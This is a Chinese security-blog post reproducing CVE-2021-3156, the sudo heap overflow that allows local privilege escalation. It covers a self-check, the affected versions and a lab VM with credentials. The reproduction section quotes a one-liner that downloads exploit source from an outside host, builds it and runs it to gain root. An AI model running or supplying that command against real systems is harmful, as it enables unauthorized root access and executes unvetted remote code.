User-Profile-Image
hankin
  • 5
请到[后台->外观->菜单]中设置菜单。
  • 分类
    • 靶机渗透
    • 计算机小技巧
    • 漏洞复现
    • 未分类
    • 数据结构
    • 内网渗透
    • 代码审计
    • XSS
    • WEB安全漏洞学习
    • Web
    • python
    • PHP
    • NodeJS
    • MYSQL
    • Misc
    • JavaScript
    • Docker
    • CTF相关知识点
    • CTFWP
    • Crypto
    • Cobalt Strike
  • 页面
  • 友链
    • 三哥的博客
    • Root师傅的博客
    • EDS师傅的博客
    • 天正哥的博客
    • 天尘翼师傅的博客
    • 熵增师傅的github
    • 信仰的博客
    • Jadore的博客
Help?

Please contact us on our email for need any support

Support
    首页   ›   WEB安全漏洞学习   ›   漏洞复现   ›   正文
漏洞复现

sudo本地提权漏洞

2021-02-01 15:46:39
111  0 0
Text.

这个漏洞太强了,我觉得近一段时间这个都可以维持了。这里贴上宽字节安全给的虚拟机链接。

链接:https://pan.baidu.com/s/18Bc-HipGuBxq_Fg2dzZVlg
提取码:unic

虚拟机的用户名密码为 vagrant/unicodesec

CVE-2021-3156: 缓冲区溢出漏洞

在sudo解析命令行参数的方式中发现了基于堆的缓冲区溢出。任何本地用户(普通用户和系统用户,sudoer和非sudoers)都可以利用此漏洞,而无需进行身份验证,攻击者不需要知道用户的密码。成功利用此漏洞可以获得root权限。

用户可以使用如下方法进行自查: 以非root用户登录系统,并使用命令sudoedit -s /

  • 如果响应一个以sudoedit:开头的报错,那么表明存在漏洞。
  • 如果响应一个以usage:开头的报错,那么表明补丁已经生效。

漏洞影响版本

sudo 1.8.2-1.8.31p2

sudo 1.9.0-1.9.5p1

不受影响版本:sudo 1.9.5p2

漏洞复现

更有小伙伴在朋友圈贴出几句话提权

mkdir CVE-2021-3156 && cd CVE-2021-3156/ && wget www.itznxh.com/CVE-2021-3156/hax.c && wget www.itznxh.com/CVE-2021-3156/lib.c &&wget www.itznxh.com/CVE-2021-3156/Makefile && make &&./sudo-hax-me-a-sandwich 0

提完收工。

评论 (0)

点击这里取消回复。

欢迎您 游客  

近期文章
  • 免杀QuasarRAT
  • 密码保护:python反序列化免杀上线CS
  • Hgame2021
  • Shiro反序列化漏洞复现
  • 密码保护:2020祥云杯决赛AWD赛题复盘
近期评论
    文章归档
    • 2021年2月
    • 2021年1月
    • 2020年12月
    • 2020年11月
    • 2020年9月
    • 2020年7月
    • 2020年6月
    • 2020年5月
    • 2020年4月
    • 2020年3月
    • 2020年2月
    • 2020年1月
    分类目录
    • Cobalt Strike
    • Crypto
    • CTFWP
    • CTF相关知识点
    • Docker
    • JavaScript
    • Misc
    • MYSQL
    • NodeJS
    • PHP
    • python
    • Web
    • WEB安全漏洞学习
    • XSS
    • 代码审计
    • 内网渗透
    • 数据结构
    • 未分类
    • 漏洞复现
    • 计算机小技巧
    • 靶机渗透
    功能
    • 登录
    • 条目feed
    • 评论feed
    • WordPress.org
    分类目录
    Copyright © 2021 网站备案号: 蒙ICP备20000552号-1
    smarty_hankin 主题. Designed by hankin
    主页
    页面
    博主
    purplet 管理员
    努力并有所方向
    167 文章 0 评论 34696 浏览
    测试
    测试